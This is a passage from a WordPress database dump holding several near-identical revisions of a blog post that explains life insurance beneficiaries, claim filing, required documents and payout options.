style=\"color: #ffffff;\">-</span>\r\nBeneficiaries who choose an annuity will receive a predetermined annual payment for a predetermined number of years in accordance with the annuitization date.\r\n\r\n\r\nBeing a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help when needed.','What To Expect As A Beneficiary On A Life Insurance Policy','','inherit','closed','closed','','256-revision-v1','','','2023-03-13 14:13:07','2023-03-13 14:13:07','',256,'http://cmdev-site1.com/?p=268',0,'revision','',0),(275,3,'2023-03-13 14:23:34','2023-03-13 14:23:34','<h2><span style=\"color: #ffffff;\">-</span></h2>\r\n<h2><strong>What is a beneficiary for a life insurance policy?</strong></h2>\r\nA beneficiary is a person or organization designated to receive a death benefit payout from the insurer once the insured passes away.\r\n\r\nOften, beneficiaries are loved ones listed by the insured on their life insurance policy before they pass away. However, beneficiaries can be trusted non-relatives, friends, business partners, and even charitable organizations.\r\n\r\n&nbsp;\r\n<h2><strong>How do beneficiaries get a death benefit?</strong></h2>\r\nIf you’ve been listed as a beneficiary on a life insurance policy, you will likely get a death benefit payout from your loved one’s life insurance policy. In life insurance policies, death benefits vary in amount, and depend on the type of life insurance policy.\r\n\r\nSome life insurance policies only pay a death benefit under certain conditions. However, before any death benefit is paid out, the beneficiary will have to file a claim on the life insurance policy.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<blockquote><span style=\"font-size: 18pt;\">Being a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help where needed.</span></blockquote>\r\n<h2><strong><span style=\"color: #ffffff;\">-</span>\r\nHow do beneficiaries file a life insurance claim?</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\nTo claim the death benefit, life insurance beneficiaries must submit a claim to the appropriate insurance company. Since insurance companies won’t generally reach out to you, it’s important you contact the appropriate insurance company and file your claim as soon as possible.\r\n\r\nOnce you know the name of the insurance company and have contacted them, you will be asked to submit certain documents to start the claim filing process.\r\n\r\nThe best way to determine what documents are needed is to contact the customer service department for the insurance company the policy was purchased. Generally speaking, life insurance companies require those filing a claim to provide the following:\r\n<ul>\r\n 	<li>\r\n<h3><strong>Death certificate:</strong></h3>\r\n</li>\r\n</ul>\r\nThe insurance company will need a certified copy of the insured’s death certificate. This proof of death ensures the policy is being claimed legitimately and helps prevent fraud. To receive a certified copy of the death certificate, you’ll need to contact the funeral home or the medical professional who confirmed the time and place of death.\r\n\r\nHowever, you can also request a copy from the local vital records office. Keep in mind it can take a bit of time to receive a copy, so stay on top of this.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Claim form:</strong></h3>\r\n</li>\r\n</ul>\r\nAlso known as a “request for benefits,” this form asks for information such as cause of death, insured’s name, and policy number. You may also need to indicate your relationship to the policyholder and how you would like to receive the death benefit.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Policy document:</strong></h3>\r\n</li>\r\n</ul>\r\nEverything from pertinent policy information to relevant information on the insured will be in this document. If you’re having trouble locating the policy, you can try contacting the insurance company directly, contacting the life insurance agent associated with the policy, or reaching out to the policyholder’s financial advisor for further insight.\r\n\r\nDepending on the policy the deceased had, you may find the insurance company requires additional documents. Make sure to provide additional documents as necessary and at the discretion of the insurance company.\r\n<h2><strong>You gathered your documents, now what?</strong></h2>\r\nOnce you’ve gathered the necessary documents to file a claim, it’s time you submit the documents. Be sure to make copies of the documents for your own records – this helps you quickly reference them when the insurance company reaches out. Once the claim is filed, you will have to wait for the claim to be processed.\r\n\r\nIn other words, the insurance company will review the information provided and make a determination on the claim.\r\n\r\nKeep in mind some insurance policies do not pay out a death benefit if the insured dies under certain circumstances, so it is possible to get a request for more information or even to have a claim rejected.\r\n<h2><strong>Choose how you want to receive the death benefit.</strong></h2>\r\nIf your claim has been approved, there are a few different ways you may be able to receive the death benefit. This can depend on the insurance company. Two options in which a death benefit can be received are lump-sum or annuities.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Lump-sum:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose a lump-sum payment will receive the entire death benefit at once.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Annuity:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose an annuity will receive a predetermined annual payment for a predetermined number of years in accordance with the annuitization date.\r\n\r\nBeing a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help when needed.','What To Expect As A Beneficiary On A Life Insurance Policy','','inherit','closed','closed','','256-revision-v1','','','2023-03-13 14:23:34','2023-03-13 14:23:34','',256,'http://cmdev-site1.com/?p=275',0,'revision','',0),(269,3,'2023-03-13 14:16:19','2023-03-13 14:16:19','<h2><strong>What is a beneficiary for a life insurance policy?</strong></h2>\r\nA beneficiary is a person or organization designated to receive a death benefit payout from the insurer once the insured passes away.\r\n\r\nOften, beneficiaries are loved ones listed by the insured on their life insurance policy before they pass away. However, beneficiaries can be trusted non-relatives, friends, business partners, and even charitable organizations.\r\n<h2><strong>How do beneficiaries get a death benefit?</strong></h2>\r\nIf you’ve been listed as a beneficiary on a life insurance policy, you will likely get a death benefit payout from your loved one’s life insurance policy. In life insurance policies, death benefits vary in amount, and depend on the type of life insurance policy.\r\n\r\nSome life insurance policies only pay a death benefit under certain conditions. However, before any death benefit is paid out, the beneficiary will have to file a claim on the life insurance policy.\r\n<blockquote><span style=\"font-size: 18pt;\">Being a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help where needed.</span></blockquote>\r\n<h2><strong><span style=\"color: #ffffff;\">-</span>\r\nHow do beneficiaries file a life insurance claim?</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\nTo claim the death benefit, life insurance beneficiaries must submit a claim to the appropriate insurance company. Since insurance companies won’t generally reach out to you, it’s important you contact the appropriate insurance company and file your claim as soon as possible.\r\n\r\nOnce you know the name of the insurance company and have contacted them, you will be asked to submit certain documents to start the claim filing process.\r\n\r\nThe best way to determine what documents are needed is to contact the customer service department for the insurance company the policy was purchased. Generally speaking, life insurance companies require those filing a claim to provide the following:\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Death certificate:</strong></h3>\r\n</li>\r\n</ul>\r\nThe insurance company will need a certified copy of the insured’s death certificate. This proof of death ensures the policy is being claimed legitimately and helps prevent fraud. To receive a certified copy of the death certificate, you’ll need to contact the funeral home or the medical professional who confirmed the time and place of death.\r\n\r\nHowever, you can also request a copy from the local vital records office. Keep in mind it can take a bit of time to receive a copy, so stay on top of this.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Claim form:</strong></h3>\r\n</li>\r\n</ul>\r\nAlso known as a “request for benefits,” this form asks for information such as cause of death, insured’s name, and policy number. You may also need to indicate your relationship to the policyholder and how you would like to receive the death benefit.\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li>\r\n<h3><strong>Policy document:</strong></h3>\r\n</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\nEverything from pertinent policy information to relevant information on the insured will be in this document. If you’re having trouble locating the policy, you can try contacting the insurance company directly, contacting the life insurance agent associated with the policy, or reaching out to the policyholder’s financial advisor for further insight.\r\n\r\n\r\nDepending on the policy the deceased had, you may find the insurance company requires additional documents. Make sure to provide additional documents as necessary and at the discretion of the insurance company.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h2><strong>You gathered your documents, now what?</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\nOnce you’ve gathered the necessary documents to file a claim, it’s time you submit the documents. Be sure to make copies of the documents for your own records – this helps you quickly reference them when the insurance company reaches out. Once the claim is filed, you will have to wait for the claim to be processed.\r\n\r\nIn other words, the insurance company will review the information provided and make a determination on the claim.\r\n\r\nKeep in mind some insurance policies do not pay out a death benefit if the insured dies under certain circumstances, so it is possible to get a request for more information or even to have a claim rejected.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">z</span>\r\n<h2><strong>Choose how you want to receive the death benefit.</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\nIf your claim has been approved, there are a few different ways you may be able to receive the death benefit. This can depend on the insurance company. Two options in which a death benefit can be received are lump-sum or annuities.\r\n<h3></h3>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Lump-sum:</strong></h3>\r\n</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>Beneficiaries who choose a lump-sum payment will receive the entire death benefit at once.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Annuity:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose an annuity will receive a predetermined annual payment for a predetermined number of years in accordance with the annuitization date.\r\n\r\nBeing a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help when needed.','What To Expect As A Beneficiary On A Life Insurance Policy','','inherit','closed','closed','','256-revision-v1','','','2023-03-13 14:16:19','2023-03-13 14:16:19','',256,'http://cmdev-site1.com/?p=269',0,'revision','',0),(270,3,'2023-03-13 14:18:00','2023-03-13 14:18:00','<h2><strong>What is a beneficiary for a life insurance policy?</strong></h2>\r\nA beneficiary is a person or organization designated to receive a death benefit payout from the insurer once the insured passes away.\r\n\r\nOften, beneficiaries are loved ones listed by the insured on their life insurance policy before they pass away. However, beneficiaries can be trusted non-relatives, friends, business partners, and even charitable organizations.\r\n<h2><strong>How do beneficiaries get a death benefit?</strong></h2>\r\nIf you’ve been listed as a beneficiary on a life insurance policy, you will likely get a death benefit payout from your loved one’s life insurance policy. In life insurance policies, death benefits vary in amount, and depend on the type of life insurance policy.\r\n\r\nSome life insurance policies only pay a death benefit under certain conditions. However, before any death benefit is paid out, the beneficiary will have to file a claim on the life insurance policy.\r\n<blockquote><span style=\"font-size: 18pt;\">Being a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help where needed.</span></blockquote>\r\n<h2><strong><span style=\"color: #ffffff;\">-</span>\r\nHow do beneficiaries file a life insurance claim?</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\nTo claim the death benefit, life insurance beneficiaries must submit a claim to the appropriate insurance company. Since insurance companies won’t generally reach out to you, it’s important you contact the appropriate insurance company and file your claim as soon as possible.\r\n\r\nOnce you know the name of the insurance company and have contacted them, you will be asked to submit certain documents to start the claim filing process.\r\n\r\nThe best way to determine what documents are needed is to contact the customer service department for the insurance company the policy was purchased. Generally speaking, life insurance companies require those filing a claim to provide the following:\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Death certificate:</strong></h3>\r\n</li>\r\n</ul>\r\nThe insurance company will need a certified copy of the insured’s death certificate. This proof of death ensures the policy is being claimed legitimately and helps prevent fraud. To receive a certified copy of the death certificate, you’ll need to contact the funeral home or the medical professional who confirmed the time and place of death.\r\n\r\nHowever, you can also request a copy from the local vital records office. Keep in mind it can take a bit of time to receive a copy, so stay on top of this.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Claim form:</strong></h3>\r\n</li>\r\n</ul>\r\nAlso known as a “request for benefits,” this form asks for information such as cause of death, insured’s name, and policy number. You may also need to indicate your relationship to the policyholder and how you would like to receive the death benefit.\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li>\r\n<h3><strong>Policy document:</strong></h3>\r\n</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\nEverything from pertinent policy information to relevant information on the insured will be in this document. If you’re having trouble locating the policy, you can try contacting the insurance company directly, contacting the life insurance agent associated with the policy, or reaching out to the policyholder’s financial advisor for further insight.\r\n\r\n\r\nDepending on the policy the deceased had, you may find the insurance company requires additional documents. Make sure to provide additional documents as necessary and at the discretion of the insurance company.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h2><strong>You gathered your documents, now what?</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\nOnce you’ve gathered the necessary documents to file a claim, it’s time you submit the documents. Be sure to make copies of the documents for your own records – this helps you quickly reference them when the insurance company reaches out. Once the claim is filed, you will have to wait for the claim to be processed.\r\n\r\nIn other words, the insurance company will review the information provided and make a determination on the claim.\r\n\r\nKeep in mind some insurance policies do not pay out a death benefit if the insured dies under certain circumstances, so it is possible to get a request for more information or even to have a claim rejected.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">z</span>\r\n<h2><strong>Choose how you want to receive the death benefit.</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\nIf your claim has been approved, there are a few different ways you may be able to receive the death benefit. This can depend on the insurance company. Two options in which a death benefit can be received are lump-sum or annuities.\r\n<h3></h3>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Lump-sum:</strong></h3>\r\n</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>Beneficiaries who choose a lump-sum payment will receive the entire death benefit at once.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Annuity:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose an annuity will receive a predetermined annual payment for a predetermined number of years in accordance with the annuitization date.\r\n\r\nBeing a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help when needed.','What To Expect As A Beneficiary On A Life Insurance Policy','','inherit','closed','closed','','256-revision-v1','','','2023-03-13 14:18:00','2023-03-13 14:18:00','',256,'http://cmdev-site1.com/?p=270',0,'revision','',0),(271,3,'2023-03-13 14:18:20','2023-03-13 14:18:20','<h2><strong>What is a beneficiary for a life insurance policy?</strong></h2>\r\n&nbsp;\r\n\r\nA beneficiary is a person or organization designated to receive a death benefit payout from the insurer once the insured passes away.\r\n\r\nOften, beneficiaries are loved ones listed by the insured on their life insurance policy before they pass away. However, beneficiaries can be trusted non-relatives, friends, business partners, and even charitable organizations.\r\n\r\n&nbsp;\r\n<h2><strong>How do beneficiaries get a death benefit?</strong></h2>\r\nIf you’ve been listed as a beneficiary on a life insurance policy, you will likely get a death benefit payout from your loved one’s life insurance policy. In life insurance policies, death benefits vary in amount, and depend on the type of life insurance policy.\r\n\r\nSome life insurance policies only pay a death benefit under certain conditions. However, before any death benefit is paid out, the beneficiary will have to file a claim on the life insurance policy.\r\n<blockquote><span style=\"font-size: 18pt;\">Being a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help where needed.</span></blockquote>\r\n<h2><strong><span style=\"color: #ffffff;\">-</span>\r\nHow do beneficiaries file a life insurance claim?</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\nTo claim the death benefit, life insurance beneficiaries must submit a claim to the appropriate insurance company. Since insurance companies won’t generally reach out to you, it’s important you contact the appropriate insurance company and file your claim as soon as possible.\r\n\r\nOnce you know the name of the insurance company and have contacted them, you will be asked to submit certain documents to start the claim filing process.\r\n\r\nThe best way to determine what documents are needed is to contact the customer service department for the insurance company the policy was purchased. Generally speaking, life insurance companies require those filing a claim to provide the following:\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Death certificate:</strong></h3>\r\n</li>\r\n</ul>\r\nThe insurance company will need a certified copy of the insured’s death certificate. This proof of death ensures the policy is being claimed legitimately and helps prevent fraud. To receive a certified copy of the death certificate, you’ll need to contact the funeral home or the medical professional who confirmed the time and place of death.\r\n\r\nHowever, you can also request a copy from the local vital records office. Keep in mind it can take a bit of time to receive a copy, so stay on top of this.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Claim form:</strong></h3>\r\n</li>\r\n</ul>\r\nAlso known as a “request for benefits,” this form asks for information such as cause of death, insured’s name, and policy number. You may also need to indicate your relationship to the policyholder and how you would like to receive the death benefit.\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li>\r\n<h3><strong>Policy document:</strong></h3>\r\n</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\nEverything from pertinent policy information to relevant information on the insured will be in this document. If you’re having trouble locating the policy, you can try contacting the insurance company directly, contacting the life insurance agent associated with the policy, or reaching out to the policyholder’s financial advisor for further insight.\r\n\r\n\r\nDepending on the policy the deceased had, you may find the insurance company requires additional documents. Make sure to provide additional documents as necessary and at the discretion of the insurance company.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h2><strong>You gathered your documents, now what?</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\nOnce you’ve gathered the necessary documents to file a claim, it’s time you submit the documents. Be sure to make copies of the documents for your own records – this helps you quickly reference them when the insurance company reaches out. Once the claim is filed, you will have to wait for the claim to be processed.\r\n\r\nIn other words, the insurance company will review the information provided and make a determination on the claim.\r\n\r\nKeep in mind some insurance policies do not pay out a death benefit if the insured dies under certain circumstances, so it is possible to get a request for more information or even to have a claim rejected.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">z</span>\r\n<h2><strong>Choose how you want to receive the death benefit.</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\nIf your claim has been approved, there are a few different ways you may be able to receive the death benefit. This can depend on the insurance company. Two options in which a death benefit can be received are lump-sum or annuities.\r\n<h3></h3>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Lump-sum:</strong></h3>\r\n</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>Beneficiaries who choose a lump-sum payment will receive the entire death benefit at once.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Annuity:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose an annuity will receive a predetermined annual payment for a predetermined number of years in accordance with the annuitization date.\r\n\r\nBeing a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help when needed.','What To Expect As A Beneficiary On A Life Insurance Policy','','inherit','closed','closed','','256-revision-v1','','','2023-03-13 14:18:20','2023-03-13 14:18:20','',256,'http://cmdev-site1.com/?p=271',0,'revision','',0),(272,3,'2023-03-13 14:18:56','2023-03-13 14:18:56','<h2><span style=\"color: #ffffff;\">-</span></h2>\r\n<h2><strong>What is a beneficiary for a life insurance policy?</strong></h2>\r\nA beneficiary is a person or organization designated to receive a death benefit payout from the insurer once the insured passes away.\r\n\r\nOften, beneficiaries are loved ones listed by the insured on their life insurance policy before they pass away. However, beneficiaries can be trusted non-relatives, friends, business partners, and even charitable organizations.\r\n\r\n&nbsp;\r\n<h2><strong>How do beneficiaries get a death benefit?</strong></h2>\r\nIf you’ve been listed as a beneficiary on a life insurance policy, you will likely get a death benefit payout from your loved one’s life insurance policy. In life insurance policies, death benefits vary in amount, and depend on the type of life insurance policy.\r\n\r\nSome life insurance policies only pay a death benefit under certain conditions. However, before any death benefit is paid out, the beneficiary will have to file a claim on the life insurance policy.\r\n<blockquote><span style=\"font-size: 18pt;\">Being a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help where needed.</span></blockquote>\r\n<h2><strong><span style=\"color: #ffffff;\">-</span>\r\nHow do beneficiaries file a life insurance claim?</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\nTo claim the death benefit, life insurance beneficiaries must submit a claim to the appropriate insurance company. Since insurance companies won’t generally reach out to you, it’s important you contact the appropriate insurance company and file your claim as soon as possible.\r\n\r\nOnce you know the name of the insurance company and have contacted them, you will be asked to submit certain documents to start the claim filing process.\r\n\r\nThe best way to determine what documents are needed is to contact the customer service department for the insurance company the policy was purchased. Generally speaking, life insurance companies require those filing a claim to provide the following:\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Death certificate:</strong></h3>\r\n</li>\r\n</ul>\r\nThe insurance company will need a certified copy of the insured’s death certificate. This proof of death ensures the policy is being claimed legitimately and helps prevent fraud. To receive a certified copy of the death certificate, you’ll need to contact the funeral home or the medical professional who confirmed the time and place of death.\r\n\r\nHowever, you can also request a copy from the local vital records office. Keep in mind it can take a bit of time to receive a copy, so stay on top of this.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Claim form:</strong></h3>\r\n</li>\r\n</ul>\r\nAlso known as a “request for benefits,” this form asks for information such as cause of death, insured’s name, and policy number. You may also need to indicate your relationship to the policyholder and how you would like to receive the death benefit.\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li>\r\n<h3><strong>Policy document:</strong></h3>\r\n</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\nEverything from pertinent policy information to relevant information on the insured will be in this document. If you’re having trouble locating the policy, you can try contacting the insurance company directly, contacting the life insurance agent associated with the policy, or reaching out to the policyholder’s financial advisor for further insight.\r\n\r\n\r\nDepending on the policy the deceased had, you may find the insurance company requires additional documents. Make sure to provide additional documents as necessary and at the discretion of the insurance company.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h2><strong>You gathered your documents, now what?</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\nOnce you’ve gathered the necessary documents to file a claim, it’s time you submit the documents. Be sure to make copies of the documents for your own records – this helps you quickly reference them when the insurance company reaches out. Once the claim is filed, you will have to wait for the claim to be processed.\r\n\r\nIn other words, the insurance company will review the information provided and make a determination on the claim.\r\n\r\nKeep in mind some insurance policies do not pay out a death benefit if the insured dies under certain circumstances, so it is possible to get a request for more information or even to have a claim rejected.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">z</span>\r\n<h2><strong>Choose how you want to receive the death benefit.</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\nIf your claim has been approved, there are a few different ways you may be able to receive the death benefit. This can depend on the insurance company. Two options in which a death benefit can be received are lump-sum or annuities.\r\n<h3></h3>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Lump-sum:</strong></h3>\r\n</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>Beneficiaries who choose a lump-sum payment will receive the entire death benefit at once.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Annuity:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose an annuity will receive a predetermined annual payment for a predetermined number of years in accordance with the annuitization date.\r\n\r\nBeing a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help when needed.','What To Expect As A Beneficiary On A Life Insurance Policy','','inherit','closed','closed','','256-revision-v1','','','2023-03-13 14:18:56','2023-03-13 14:18:56','',256,'http://cmdev-site1.com/?p=272',0,'revision','',0),(274,3,'2023-03-13 14:20:06','2023-03-13 14:20:06','<h2><span style=\"color: #ffffff;\">-</span></h2>\r\n<h2><strong>What is a beneficiary for a life insurance policy?</strong></h2>\r\nA beneficiary is a person or organization designated to receive a death benefit payout from the insurer once the insured passes away.\r\n\r\nOften, beneficiaries are loved ones listed by the insured on their life insurance policy before they pass away. However, beneficiaries can be trusted non-relatives, friends, business partners, and even charitable organizations.\r\n\r\n&nbsp;\r\n<h2><strong>How do beneficiaries get a death benefit?</strong></h2>\r\nIf you’ve been listed as a beneficiary on a life insurance policy, you will likely get a death benefit payout from your loved one’s life insurance policy. In life insurance policies, death benefits vary in amount, and depend on the type of life insurance policy.\r\n\r\nSome life insurance policies only pay a death benefit under certain conditions. However, before any death benefit is paid out, the beneficiary will have to file a claim on the life insurance policy.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<blockquote><span style=\"font-size: 18pt;\">Being a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help where needed.</span></blockquote>\r\n<h2><strong><span style=\"color: #ffffff;\">-</span>\r\nHow do beneficiaries file a life insurance claim?</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\nTo claim the death benefit, life insurance beneficiaries must submit a claim to the appropriate insurance company. Since insurance companies won’t generally reach out to you, it’s important you contact the appropriate insurance company and file your claim as soon as possible.\r\n\r\nOnce you know the name of the insurance company and have contacted them, you will be asked to submit certain documents to start the claim filing process.\r\n\r\nThe best way to determine what documents are needed is to contact the customer service department for the insurance company the policy was purchased. Generally speaking, life insurance companies require those filing a claim to provide the following:\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Death certificate:</strong></h3>\r\n</li>\r\n</ul>\r\nThe insurance company will need a certified copy of the insured’s death certificate. This proof of death ensures the policy is being claimed legitimately and helps prevent fraud. To receive a certified copy of the death certificate, you’ll need to contact the funeral home or the medical professional who confirmed the time and place of death.\r\n\r\nHowever, you can also request a copy from the local vital records office. Keep in mind it can take a bit of time to receive a copy, so stay on top of this.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Claim form:</strong></h3>\r\n</li>\r\n</ul>\r\nAlso known as a “request for benefits,” this form asks for information such as cause of death, insured’s name, and policy number. You may also need to indicate your relationship to the policyholder and how you would like to receive the death benefit.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Policy document:</strong></h3>\r\n</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\nEverything from pertinent policy information to relevant information on the insured will be in this document. If you’re having trouble locating the policy, you can try contacting the insurance company directly, contacting the life insurance agent associated with the policy, or reaching out to the policyholder’s financial advisor for further insight.\r\n\r\n\r\nDepending on the policy the deceased had, you may find the insurance company requires additional documents. Make sure to provide additional documents as necessary and at the discretion of the insurance company.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h2><strong>You gathered your documents, now what?</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\nOnce you’ve gathered the necessary documents to file a claim, it’s time you submit the documents. Be sure to make copies of the documents for your own records – this helps you quickly reference them when the insurance company reaches out. Once the claim is filed, you will have to wait for the claim to be processed.\r\n\r\nIn other words, the insurance company will review the information provided and make a determination on the claim.\r\n\r\nKeep in mind some insurance policies do not pay out a death benefit if the insured dies under certain circumstances, so it is possible to get a request for more information or even to have a claim rejected.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">z</span>\r\n<h2><strong>Choose how you want to receive the death benefit.</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\nIf your claim has been approved, there are a few different ways you may be able to receive the death benefit. This can depend on the insurance company. Two options in which a death benefit can be received are lump-sum or annuities.\r\n<h3></h3>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Lump-sum:</strong></h3>\r\n</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>Beneficiaries who choose a lump-sum payment will receive the entire death benefit at once.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Annuity:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose an annuity will receive a predetermined annual payment for a predetermined number of years in accordance with the annuitization date.\r\n\r\nBeing a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help when needed.','What To Expect As A Beneficiary On A Life Insurance Policy','','inherit','closed','closed','','256-revision-v1','','','2023-03-13 14:20:06','2023-03-13 14:20:06','',256,'http://cmdev-site1.com/?p=274',0,'revision','',0),(273,3,'2023-03-13 14:19:21','2023-03-13 14:19:21','<h2><span style=\"color: #ffffff;\">-</span></h2>\r\n<h2><strong>What is a beneficiary for a life insurance policy?</strong></h2>\r\nA beneficiary is a person or organization designated to receive a death benefit payout from the insurer once the insured passes away.\r\n\r\nOften, beneficiaries are loved ones listed by the insured on their life insurance policy before they pass away. However, beneficiaries can be trusted non-relatives, friends, business partners, and even charitable organizations.\r\n\r\n&nbsp;\r\n<h2><strong>How do beneficiaries get a death benefit?</strong></h2>\r\nIf you’ve been listed as a beneficiary on a life insurance policy, you will likely get a death benefit payout from your loved one’s life insurance policy. In life insurance policies, death benefits vary in amount, and depend on the type of life insurance policy.\r\n\r\nSome life insurance policies only pay a death benefit under certain conditions. However, before any death benefit is paid out, the beneficiary will have to file a claim on the life insurance policy.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<blockquote><span style=\"font-size: 18pt;\">Being a beneficiary is a big deal, but it doesn’t have to 